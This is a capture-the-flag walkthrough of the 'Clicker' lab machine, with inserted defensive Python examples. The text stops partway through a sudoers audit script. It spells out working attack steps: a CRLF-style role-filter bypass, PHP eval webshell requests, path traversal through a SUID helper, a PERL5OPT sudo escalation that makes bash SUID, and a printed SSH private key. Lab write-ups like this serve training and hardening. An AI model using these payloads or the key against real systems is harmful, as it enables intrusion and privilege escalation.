Clicker_Medium

Grumble: this box wipes its data every so often, which is incredibly annoying!!!

Information gathering

nmap:
--min-rate 10000   send packets at a minimum rate of 10000 per second
-p-                scan all ports
-p80,135           scan only ports 80 and 135
-sU                UDP scan
-sT                TCP connect scan
-sV                service version detection
-sC                run the default script set
-O                 operating system and version detection
--script=vuln      basic vulnerability script scan


nmap -p- --min-rate 10000 10.129.47.107
nmap -p- -sU --min-rate 10000 10.129.47.107
nmap -p22,80,111,2049,34327,39809,45161,53053,60989 --script=vuln 10.129.47.107
nmap -p22,80,111,2049,34327,39809,45161,53053,60989 -sV -sC -sT -O 10.129.47.107

SSH on 22/TCP is OpenSSH 8.9p1.

HTTP on 80/TCP is Apache httpd 2.4.52.

2049/TCP is running NFS (Network File System).

In addition, the host filters 111/TCP, the rpcbind port, which may indicate a firewall is enabled and restricting access to RPC services.

Visiting port 80 redirects to http://clicker.htb/

Edit the hosts file

vim /etc/hosts

Vulnerability discovery

Poking around port 80 turned up nothing exploitable, so following the nmap results, start with the NFS service on port 2049.

NFS (Network File System) is a distributed file system protocol that lets computers share files and directories over a network.
NFS was originally developed by Sun Microsystems for file sharing between UNIX and UNIX-like systems. It follows a client-server model: files are stored on the server and made available to clients over the network. A client can mount a server-side file system remotely, after which those files behave as if they were local.
NFS communicates over RPC (Remote Procedure Call). The client sends a request to the server, and the server returns the requested file or directory. NFS supports read, write, create and delete operations and provides file locking to keep concurrent access consistent.

NFS file-sharing vulnerability

Reference articles: 6-19漏洞利用-nfs获取目标密码文件 (CSDN blog); nfs文件共享漏洞 (CSDN blog)

showmount -e 10.129.47.107
mount -t nfs 10.129.47.107:/mnt/backups /root/桌面/nfs -o nolock

Unpack the backup and read the source; the breakthrough is in save_game.php.

This code is a PHP page that saves the user's in-game profile and updates the session.

First, it calls session_start() to start a session and decides whether the user is logged in by checking that $_SESSION['PLAYER'] is set and non-empty. If the user is logged in, it collects the GET parameters and calls save_profile() to store the player's game data in the database. Note that while collecting the GET parameters the code iterates over the parameter list looking for a parameter named "role", to stop a malicious user from changing their role by supplying it. However, it performs no other filtering or validation of user input, so a malicious user can still attack the system by passing crafted parameters in the GET request. The code then updates the session with the user's clicks and level and uses header() to redirect back to the home page with a status message.

From the if statement in admin.php: if $_SESSION['ROLE'] is not "Admin", i.e. the user is not an administrator, the code calls header() to redirect the user to the home page and stops executing the script.

So we can try inserting role=Admin into the parameters submitted to save_game.php to grant the current account administrator privileges.

Exploitation

Register an arbitrary account and log in.

http://clicker.htb/play.php

Appending the parameter directly returns "Malicious activity detected!", so try to bypass it.

CRLF injection reference: 每日漏洞 | CRLF注入 (FreeBuf网络安全行业门户)

Either %0a or %0d works.

GET /save_game.php?clicks=0&level=1&role%0d=Admin HTTP/1.1
Host: clicker.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://clicker.htb/play.php
Cookie: PHPSESSID=sufjgvlfjcdiqk7fn7o7enn5g7
Upgrade-Insecure-Requests: 1



GET /save_game.php?clicks=0&level=1&role%0a=Admin HTTP/1.1
Host: clicker.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://clicker.htb/play.php
Cookie: PHPSESSID=sufjgvlfjcdiqk7fn7o7enn5g7
Upgrade-Insecure-Requests: 1
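As an added defender's example (not code from this post or from the Clicker application), the following Python mirrors the two ways of filtering the save_game.php field list described above: a blocklist that rejects only a parameter named exactly "role", which the name role%0a (decoded to "role\n") slips past, and an allowlist of known column names, which rejects any name it does not recognise. The column set, the use of parse_qsl and the UPDATE statement shape are assumptions chosen to reproduce the behaviour the post describes, not the real application's code.

```python
from urllib.parse import parse_qsl

# Columns that save_game.php legitimately updates (assumed set for this example).
ALLOWED_FIELDS = {"clicks", "level", "nickname"}


def parse_query(query):
    """Decode a query string the way the web layer hands it to the application.

    parse_qsl percent-decodes parameter names as well as values, so the name
    'role%0a' arrives as 'role\\n': the word 'role' with a trailing newline.
    """
    return parse_qsl(query, keep_blank_values=True)


def blocklist_filter(query):
    """Vulnerable pattern: reject only a parameter whose name is exactly 'role'.

    Returns (accepted, fields_or_reason).
    """
    fields = {}
    for key, value in parse_query(query):
        if key.lower() == "role":
            return False, "Malicious activity detected!"
        fields[key] = value
    return True, fields


def allowlist_filter(query):
    """Hardened pattern: reject any parameter name outside the known column set.

    An exact-match allowlist cannot be bypassed by decorating a name with
    whitespace, because the decorated name simply is not in the set.
    """
    fields = {}
    for key, value in parse_query(query):
        if key not in ALLOWED_FIELDS:
            return False, "unexpected field %r" % key
        fields[key] = value
    return True, fields


def build_update(fields):
    """Illustrate why the stray newline matters downstream: if parameter names
    are concatenated into a column list, SQL reads 'role\\n' as the column
    'role' followed by whitespace. The hardened path never concatenates
    caller-supplied names; column names come from ALLOWED_FIELDS only."""
    return "UPDATE players SET " + ", ".join("%s=%%s" % k for k in fields)


if __name__ == "__main__":
    for q in ("clicks=0&level=1&role=Admin", "clicks=0&level=1&role%0a=Admin"):
        for name, fn in (("blocklist", blocklist_filter), ("allowlist", allowlist_filter)):
            ok, result = fn(q)
            print("%-9s %-34r %s -> %r" % (name, q, "accepted" if ok else "rejected", result))
```

Running the script shows the blocklist accepting the decorated name and handing "role\n" straight through to the column list, while the allowlist rejects it before any SQL is built. The same reasoning applies to a mass-assignment check in any language: compare against the set of names you intend to write, never against the names you intend to forbid.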

Log out and log back in; the account now has administrator privileges.

There is an export feature here that supports txt, json and html formats.

Intercept the request and change the format to php; it is accepted. Next, try writing a webshell into the content so the export produces a PHP file.

Look at export.php.

The content of the generated file can be controlled through the current user's Nickname, Clicks and Level.

Nickname is the username chosen at registration. Registering a new account with PHP code as the username is rejected with a message that special characters are not allowed, so skip that route.

Since save_game.php lets us inject data when submitting parameters, try overriding Nickname through save_game.php instead.

Write a PHP one-line webshell:

GET /save_game.php?clicks=99999999&level=1&Nickname=<?php+eval($_POST['hacker']);+?>&role%0a=Admin HTTP/1.1
Host: clicker.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://clicker.htb/play.php
Cookie: PHPSESSID=sufjgvlfjcdiqk7fn7o7enn5g7
Upgrade-Insecure-Requests: 1

Export from http://clicker.htb/admin.php as a php file.
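The export chain above works because the extension comes from the client and because the nickname rule is enforced only at registration, not on the save_game.php path that also writes it. As an added example from the defender's side (not the post's or the application's code), this Python sketches an export routine that closes both gaps: the format is checked against the three formats the post lists, the nickname rule is applied on every write path, the numeric fields are coerced, and the file name is chosen by the server. The nickname pattern and the output layouts are assumptions for the example.

```python
import html
import json
import re
import secrets

# Formats the export feature legitimately offers (from the post: txt, json, html).
ALLOWED_FORMATS = {"txt", "json", "html"}

# Nickname rule assumed for this example. It must be enforced at every write
# path (registration and profile save alike), not only at registration.
NICKNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def validate_nickname(nickname):
    """Reject anything outside the allowed character set; return it unchanged."""
    if not isinstance(nickname, str) or not NICKNAME_RE.fullmatch(nickname):
        raise ValueError("nickname contains disallowed characters")
    return nickname


def render_export(nickname, clicks, level, fmt):
    """Return (filename, content) for a profile export, or raise ValueError.

    The client chooses only among ALLOWED_FORMATS; the extension is derived
    from that choice, and the base name is random, so no request parameter
    can steer the path or turn the file into something the web server executes.
    """
    if fmt not in ALLOWED_FORMATS:
        raise ValueError("export format %r not allowed" % (fmt,))
    nickname = validate_nickname(nickname)
    clicks = int(clicks)   # raises ValueError on non-numeric input
    level = int(level)

    if fmt == "json":
        content = json.dumps({"nickname": nickname, "clicks": clicks, "level": level})
    elif fmt == "html":
        # Escape even a validated nickname: defence in depth if the rule is ever relaxed.
        content = (
            "<table><tr><th>Nickname</th><th>Clicks</th><th>Level</th></tr>"
            "<tr><td>%s</td><td>%d</td><td>%d</td></tr></table>"
            % (html.escape(nickname), clicks, level)
        )
    else:
        content = "Nickname: %s\nClicks: %d\nLevel: %d\n" % (nickname, clicks, level)

    filename = "%s.%s" % (secrets.token_hex(8), fmt)
    return filename, content


if __name__ == "__main__":
    print(render_export("alice", 5, 1, "json"))
    for bad in (("alice", 1, 1, "php"), ("<?php eval($_POST['h']); ?>", 1, 1, "txt")):
        try:
            render_export(*bad)
        except ValueError as exc:
            print("rejected:", exc)
```

Independently of the code, the export directory should sit outside the document root or be served with script execution disabled, so that a validation slip does not immediately become code execution.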

Because the box wipes its data files periodically, spawn a reverse shell with msf to get something more stable.

Privilege escalation

SUID privilege escalation. Reference: Linux下SUID提权方法 (~Echo, CSDN blog)

The binary performs the following tasks:

1: Create the database structure and add the admin user

2: Create fake players (best not to tell anyone)

3: Reset the admin password

4: Delete all users except admin

Running ./execute_query 1 appears to execute the SQL script and print its output.

Trace it with strace to see what it does.

strace ./execute_query 1


execve("./execute_query", ["./execute_query", "1"], 0x7fff84480298 /* 13 vars */) = 0
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
brk(NULL) = 0x55a24a765000
File not readable or not found
arch_prctl(0x3001 /* ARCH_??? */, 0x7fffe69032d0) = -1 EINVAL (Invalid argument)
fcntl(0, F_GETFD) = 0
fcntl(1, F_GETFD) = 0
fcntl(2, F_GETFD) = 0
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffb09b2c000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=21007, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 21007, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffb09b26000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\237\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0 \0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 48, 848) = 48
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\"\233}\305\t\5?\344\337^)\350b\231\21\360"..., 68, 896) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2216304, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 2260560, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffb098fe000
mmap(0x7ffb09926000, 1658880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7ffb09926000
mmap(0x7ffb09abb000, 360448, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bd000) = 0x7ffb09abb000
mmap(0x7ffb09b13000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x214000) = 0x7ffb09b13000
mmap(0x7ffb09b19000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffb09b19000
close(3) = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffb098fb000
arch_prctl(ARCH_SET_FS, 0x7ffb098fb740) = 0
set_tid_address(0x7ffb098fba10) = 2703
set_robust_list(0x7ffb098fba20, 24) = 0
rseq(0x7ffb098fc0e0, 0x20, 0, 0x53053053) = 0
mprotect(0x7ffb09b13000, 16384, PROT_READ) = 0
mprotect(0x55a249dd2000, 4096, PROT_READ) = 0
mprotect(0x7ffb09b66000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7ffb09b26000, 21007) = 0
getrandom("\x5a\xbd\x67\xef\xdc\xeb\x94\xd9", 8, GRND_NONBLOCK) = 8
brk(NULL) = 0x55a24a765000
brk(0x55a24a786000) = 0x55a24a786000
setreuid(1000, 1000) = -1 EPERM (Operation not permitted)
access("/home/jack/queries/create.sql", R_OK) = -1 EACCES (Permission denied)
newfstatat(1, "", {st_mode=S_IFIFO|0600, st_size=0, ...}, AT_EMPTY_PATH) = 0
write(1, "File not readable or not found\n", 31) = 31
exit_group(0) = ?
+++ exited with 0 +++

This output is the result of tracing a program named "execute_query" with strace. strace records the system calls a program makes and the signals it receives while it runs.

From the output we can read off the following:

  1. The program was loaded and executed via execve("./execute_query").
  2. It tried to access "/etc/suid-debug", which returned ENOENT: the file does not exist.
  3. It made a series of fcntl, mmap and openat calls to load the dynamic linker's resources and shared libraries.
  4. It checked "/etc/ld.so.preload", which returned ENOENT (absent), and then opened and mapped "/etc/ld.so.cache".
  5. It loaded the shared library "/lib/x86_64-linux-gnu/libc.so.6".
  6. It performed memory operations such as mmap and mprotect to allocate and protect memory regions.
  7. It called setreuid, which returned EPERM: the current user is not permitted to perform that operation.
  8. It tried to access "/home/jack/queries/create.sql", which returned EACCES: no permission to read the file.
  9. It printed "File not readable or not found" to standard output.
  10. It exited normally through exit_group with status 0.

Tracing runs with arguments 1, 2, 3 and 4 shows that each one accesses a SQL script.

Running it directly confirms the guess: it executes the SQL script and prints the output. (The traced runs fail because a non-root strace does not let the traced program run with its set-user-ID privileges, which is also why setreuid returns EPERM in the trace.)

Arguments 1 to 4 each map to a fixed script path.

After more tracing, it turns out the program takes two arguments:

the first is a number greater than 4;

the second is the path of the SQL file to execute.

Since the base directory is /home/jack/queries, three ../ are needed to climb out of it.

strace ./execute_query 5 ../../../etc/passwd


execve("./execute_query", ["./execute_query", "5", "../../../etc/passwd"], 0x7ffccb61acf0 /* 13 vars */) = 0
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
brk(NULL) = 0x55a5dbdcf000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fffa7d41040) = -1 EINVAL (Invalid argument)
fcntl(0, F_GETFD) = 0
fcntl(1, F_GETFD) = 0
fcntl(2, F_GETFD) = 0
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff30be71000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=21007, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 21007, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff30be6b000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\237\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0 \0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 48, 848) = 48
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\"\233}\305\t\5?\344\337^)\350b\231\21\360"..., 68, 896) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2216304, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 2260560, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff30bc43000
mmap(0x7ff30bc6b000, 1658880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7ff30bc6b000
mmap(0x7ff30be00000, 360448, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bd000) = 0x7ff30be00000
mmap(0x7ff30be58000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x214000) = 0x7ff30be58000
mmap(0x7ff30be5e000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff30be5e000
close(3) = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff30bc40000
arch_prctl(ARCH_SET_FS, 0x7ff30bc40740) = 0
set_tid_address(0x7ff30bc40a10) = 2872
set_robust_list(0x7ff30bc40a20, 24) = 0
rseq(0x7ff30bc410e0, 0x20, 0, 0x53053053) = 0
mprotect(0x7ff30be58000, 16384, PROT_READ) = 0
mprotect(0x55a5db366000, 4096, PROT_READ) = 0
mprotect(0x7ff30beab000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7ff30be6b000, 21007) = 0
getrandom("\x03\x30\x24\x82\x73\x39\x44\x6d", 8, GRND_NONBLOCK) = 8
brk(NULL) = 0x55a5dbdcf000
brk(0x55a5dbdf0000) = 0x55a5dbdf0000
setreuid(1000, 1000) = -1 EPERM (Operation not permitted)
access("/home/jack/queries/../../../etc/passwd", R_OK) = -1 EACCES (Permission denied)
newfstatat(1, "", {st_mode=S_IFIFO|0600, st_size=0, ...}, AT_EMPTY_PATH) = 0
File not readable or not found
write(1, "File not readable or not found\n", 31) = 31
exit_group(0) = ?
+++ exited with 0 +++
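The trace shows the helper building "/home/jack/queries/" + argument and reading whatever that resolves to, which is what lets a relative path climb out of the query directory. As an added example (not the binary's code, whose source the post does not show), this Python implements the containment check such a SUID helper should perform before touching the file: normalise the joined path, require it to remain under the base directory, and re-check the resolved real path so a symlink inside the directory cannot point outside it. The base directory is taken from the trace on the page; the function names are assumptions.

```python
import os

# Directory the SUID helper is meant to read from (path taken from the strace output above).
QUERY_DIR = "/home/jack/queries"


def resolve_query_path(base_dir, user_path):
    """Return the absolute path of user_path inside base_dir, or None if it escapes.

    Purely lexical: normalise base_dir/user_path (collapsing '..' components) and
    require that the result still lies under base_dir. Absolute user paths are
    rejected outright rather than silently re-rooted.
    """
    if os.path.isabs(user_path):
        return None
    base = os.path.normpath(os.path.abspath(base_dir))
    candidate = os.path.normpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def open_query_file(base_dir, user_path):
    """Open the file only after the lexical check passed, then verify the real
    (symlink-resolved) path as well, since a link inside base_dir could point
    anywhere on the filesystem."""
    candidate = resolve_query_path(base_dir, user_path)
    if candidate is None:
        raise PermissionError("path escapes the query directory: %r" % (user_path,))
    real_base = os.path.realpath(base_dir)
    real = os.path.realpath(candidate)
    if os.path.commonpath([real_base, real]) != real_base:
        raise PermissionError("symlink escapes the query directory: %r" % (user_path,))
    return open(real, "r", encoding="utf-8")


if __name__ == "__main__":
    # Constructed inputs: the legitimate script name and the traversal attempts seen on the page.
    for arg in ("create.sql", "sub/../create.sql", "../../../etc/passwd", "../.ssh/id_rsa", "/etc/passwd"):
        print("%-22s -> %s" % (arg, resolve_query_path(QUERY_DIR, arg)))
```

A helper like this would also drop its effective privileges before opening anything it does not strictly need them for, and would take a script name rather than a path at all; the containment check is the minimum that turns "read any file as the owner" back into "read files from one directory".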

Try reading user jack's SSH private key.

./execute_query 5 ../.ssh/id_rsa


mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
-----BEGIN OPENSSH PRIVATE KEY----…-----END OPENSSH PRIVATE KEY----
--------------

ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-----BEGIN OPENSSH PRIVATE KEY---
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAA' at line 1

Save it locally and connect over SSH; remember to restore the missing "-" characters in the header and footer lines.

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Give the file mode 600 and log in over SSH.

chmod 600 id_rsa
ssh -i id_rsa jack@10.10.11.232

First flag found: 5fdd6314e0fb12c8713770039cf6bad7

sudo -l          check which commands the current user is allowed to run via sudo
cd /opt          change the working directory to /opt
ls -al           list all files and subdirectories in /opt with permissions, owner and modification date
cat monitor.sh   print the contents of monitor.sh

What sudo -l reveals:

Arbitrary command execution: user "jack" can run any command as any user.

SETENV privilege: user "jack" may set environment variables through SETENV without entering a password.

NOPASSWD privilege: user "jack" can run the script "/opt/monitor.sh" as root without a password.

monitor.sh is a Bash script that runs a sequence of steps and saves diagnostic data to a file.

First, it checks the current user's EUID (effective user ID); if it is not 0 (i.e. not root), it prints an error and exits.

Next, it sets the PATH environment variable to a fixed list of directories so the commands it needs can be found.

Then it uses curl to fetch a URL (http://clicker.htb/diagnostic.php?token=secret_diagnostic_token) and stores the response in the variable $data.

After that, it pretty-prints $data with xml_pp and writes the result to the screen.

If the variable $NOSAVE is "true", the script exits at this point.

Otherwise, it takes the current timestamp with date and saves the contents of data to /root/diagnostic_files/diagnostic_{timestamp}.xml.

Look at xml_pp.

Privilege escalation via CVE-2016-1531

sudo PERL5OPT=-d PERL5DB='exec "ls /root"' /opt/monitor.sh
sudo PERL5OPT=-d PERL5DB='exec "cat /root/root.txt"' /opt/monitor.sh
sudo PERL5OPT=-d PERL5DB='exec "chmod u+s /bin/bash"' /opt/monitor.sh
bash -p
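The root cause here is the sudoers configuration rather than monitor.sh itself: the SETENV tag lets the invoking user pass arbitrary variables on the sudo command line, so PERL5OPT reaches the Perl interpreter behind xml_pp regardless of env_reset. As an added defender's example (not from the post), this Python audits a sudoers-style text for exactly that pattern: SETENV tags on rules, a missing env_reset, and env_keep lists that preserve interpreter-controlling variables. The sample fragment is constructed to match what the post reports from sudo -l and is not the box's real file; the rule grammar handled is the common subset shown.

```python
import re

# Constructed sample sudoers fragment reflecting what the post reports from `sudo -l`;
# it is not the box's real configuration.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults env_keep += "LANG LC_ALL"
jack ALL=(ALL:ALL) ALL
jack ALL=(root) SETENV: NOPASSWD: /opt/monitor.sh
"""

# user host=(runas) [TAG: ...] command
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$"
)

# Variables that interpreters and the dynamic loader honour before the target's
# own code runs; letting a caller set them defeats checks such as an EUID test.
INTERPRETER_ENV = {
    "PERL5OPT", "PERL5DB", "PERL5LIB", "LD_PRELOAD", "LD_LIBRARY_PATH",
    "PYTHONPATH", "BASH_ENV", "ENV",
}


def audit_sudoers(text):
    """Return a list of (line_number, message) findings; line 0 marks a global finding."""
    findings = []
    env_reset = False
    kept = set()
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("Defaults"):
            if "env_reset" in line and "!env_reset" not in line:
                env_reset = True
            m = re.search(r'env_keep\s*\+?=\s*"([^"]*)"', line)
            if m:
                kept.update(m.group(1).split())
            continue
        m = RULE_RE.match(line)
        if not m:
            findings.append((lineno, "could not parse rule: %s" % line))
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        cmd = m.group("cmd").strip()
        if "SETENV" in tags:
            findings.append((lineno,
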